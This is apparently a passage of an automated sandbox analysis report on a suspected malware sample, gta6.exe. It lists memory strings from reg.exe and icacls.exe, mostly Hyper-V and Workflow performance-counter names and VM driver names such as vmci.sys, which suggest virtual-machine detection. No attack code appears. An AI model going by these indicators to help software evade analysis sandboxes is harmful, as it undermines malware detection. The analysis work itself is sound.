Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs
Source: reg.exe, 00000020.00000003.1615168607.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1610991428.0000024D3578A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: icacls.exe, 0000001E.00000002.1315865422.0000024753962000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ss.svmci.syswfplwfs.sys`
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: reg.exe, 00000020.00000003.1616205398.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611881262.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612272320.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615968093.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervis
Source: reg.exe, 00000020.00000003.1593238842.0000024D350F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec487
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: reg.exe, 00000020.00000003.1583159282.0000024D35889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_none_40a51070cee1599d]^
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor;l-
Source: reg.exe, 00000020.00000003.1594895808.0000024D35106000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594776251.0000024D350D2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594703951.0000024D3510D000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594199326.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594918365.0000024D3510B000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594293310.0000024D350F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partitionui
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service)
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V jvtjinaerjcnmkc Bus"
Source: reg.exe, 00000020.00000003.1601148051.0000024D350D1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615644990.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844
Source: reg.exe, 00000020.00000003.1615327515.0000024D357C0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611343119.0000024D357C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: redictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: reg.exe, 00000020.00000003.1616146655.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615490327.0000024D3578A000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611988960.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611486893.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615758985.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611751619.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611684206.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615691839.0000024D357B1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616057154.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch P
Source: reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Count
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4788Hyper-V Hypervisor4790Logical`
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V jvtjinaerjcnmkc Bus Pipes
Source: reg.exe, 00000020.00000003.1615208152.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: er Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs Sent/sec5098GPA Space Hypercalls/sec5100Logical Processor Hypercall
Source: icacls.exe, 0000001E.00000003.1309867549.0000024753958000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmci.sys`
Source: reg.exe, 00000020.00000003.1601112480.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601008694.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1600728861.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601291746.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601421314.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshotval.
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pervisorStartupCost4906Hyper-V Hyp

Source: C:\Users\user\Desktop\gta6.exe

